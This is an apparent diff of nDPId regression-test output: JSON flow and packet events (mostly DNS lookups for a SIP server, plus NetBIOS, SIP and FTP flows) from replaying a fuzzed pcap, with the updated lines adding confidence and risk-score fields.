+00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":681,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471084097,"flow_last_seen":1120471085095,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120471085095,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471086377,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1120471086377,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471086377,"pkt":"ADBUADRWAODtAW69CABFAABIbGYAAIARSut0qAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471086377,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471086377,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1120471087098,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120471087098,"pkt":"ADBUADRWAODtAW69CABFAAA+bGcAAIARSvTAqAECwKgBAQsOADUAKohoTTUBAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
-00758{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470908872,"flow_last_seen":1120470908872,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471088463,"l3_proto":"ip4","src_ip":"128.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00875{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470908872,"flow_last_seen":1120470908872,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471088463,"l3_proto":"ip4","src_ip":"128.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470908872,"flow_last_seen":1120470908872,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471088463,"l3_proto":"ip4","src_ip":"128.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470900860,"flow_last_seen":1120470904866,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471088463,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1120471088463,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1120471088463,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471094410,"flow_last_seen":1120471094410,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471094410,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1120471094410,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120471094410,"pkt":"ADBUADRWAODtAW5TCABFAABEbGgAAIARSu3AqAECwKgBAQsPADUAMMF5YzYAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471094410,"flow_last_seen":1120471094410,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471094410,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471094410,"flow_last_seen":1120471094410,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471094410,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1120471094412,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120471094412,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cw8AR6P1dTaAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471094412,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471106433,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471094412,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471106433,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471106433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471106433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471106433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471106433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1120471106433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1120471106433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471106433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471106433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120471106433,"pkt":"ADBUADRWAODtAW69CABFAABIbG4A3oARSuPAqAECwKgBAQsQJXMANDd+8jYBAFEBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1120471107427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471107427,"pkt":"ADBUADRWAODtAW69CABFAABIbJIAAIARSuLAqAECwKgBAQsQADUANDd+8jYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00702{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00819{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00703{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00820{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
